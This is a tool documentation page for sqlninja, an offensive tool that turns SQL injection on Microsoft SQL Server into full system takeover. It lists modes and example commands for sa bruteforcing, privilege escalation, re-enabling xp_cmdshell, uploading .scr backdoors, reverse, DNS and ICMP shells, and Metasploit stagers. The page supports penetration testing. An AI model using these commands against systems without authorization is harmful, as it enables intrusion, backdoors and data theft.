Database Assessmentsql injectionmssqlexploitationshellmetasploitdns tunnel

sqlninja

SQL server injection and takeover tool that escalates SQL injection vulnerabilities on Microsoft SQL Server to full GUI access on the database. It employs advanced techniques including registry modifications, debug scripts, and Metasploit integration for remote code execution.

Description

sqlninja is designed to exploit SQL injection vulnerabilities specifically on Microsoft SQL Server, transforming them into full system compromise. Starting from a SQL injection point, it disables Data Execution Prevention via registry shots, generates debug scripts automatically, and wraps attacks with Metasploit for reliable payload delivery.

Use cases include testing MSSQL web applications for injection flaws, bruteforcing sa accounts, privilege escalation, uploading backdoors, establishing shells (direct, reverse, ICMP, DNS-tunneled), and launching Metasploit stagers. It supports comprehensive attack chains from fingerprinting to post-exploitation.

The tool requires a configuration file detailing the target and injection points, with modes handling different exploitation phases. Debug output and verbose logging aid in troubleshooting injection issues.

How It Works

sqlninja operates by injecting SQL payloads tailored for MSSQL, confirming vulnerabilities with techniques like 'waitfor delay'. It fingerprints the server, user privileges, and xp_cmdshell availability, then executes mode-specific attacks: bruteforcing sa passwords, escalating privileges by adding users to sysadmin roles, resurrecting xp_cmdshell, uploading .scr files via debug scripts, scanning for outbound ports, establishing shells over HTTP/DNS/ICMP, issuing blind OS commands, or integrating with Metasploit. All interactions use HTTP requests with configurable injection strings from sqlninja.conf.

Installation

bash
sudo apt install sqlninja

Flags

-m <mode>Required. Available modes: t/test (test injection), f/fingerprint, b/bruteforce (sa account), e/escalation (add user to sysadmin), x/resurrectxp (recreate xp_cmdshell), u/upload (.scr file), s/dirshell (direct shell), k/backscan (open outbound port), r/revshell (reverse shell), d/dnstunnel (dns tunneled shell), i/icmpshell (reverse ICMP shell), c/sqlcmd (blind OS command), m/metasploit (Metasploit wrapper)
-f <file>configuration file (default: sqlninja.conf)
-p <password>sa password
-w <wordlist>wordlist to use in bruteforce mode (dictionary method only)
-ggenerate debug script and exit (only valid in upload mode)
-vverbose output
-d <mode>activate debug: 1 (print injected commands), 2 (print raw HTTP requests), 3 (print raw HTTP responses), all (all of the above)

Examples

Connect to the target in test mode to verify if the SQL injection is working
sqlninja -m t -f /root/sqlninja.conf
Fingerprint the target to identify user, xp_cmdshell availability, and server details
sqlninja -m f -f /root/sqlninja.conf
Bruteforce the sa account using a specified wordlist in dictionary mode
sqlninja -m b -f /root/sqlninja.conf -w wordlist.txt
Escalate privileges by adding current user to sysadmin server role
sqlninja -m e -f /root/sqlninja.conf
Upload a .scr backdoor file to the target
sqlninja -m u -f /root/sqlninja.conf
Start a reverse shell from the target
sqlninja -m r -f /root/sqlninja.conf
Use Metasploit wrapper to deploy stagers on the target
sqlninja -m m -f /root/sqlninja.conf
Display full usage information and available options
sqlninja --help
Updated 2026-04-16kali.org ↗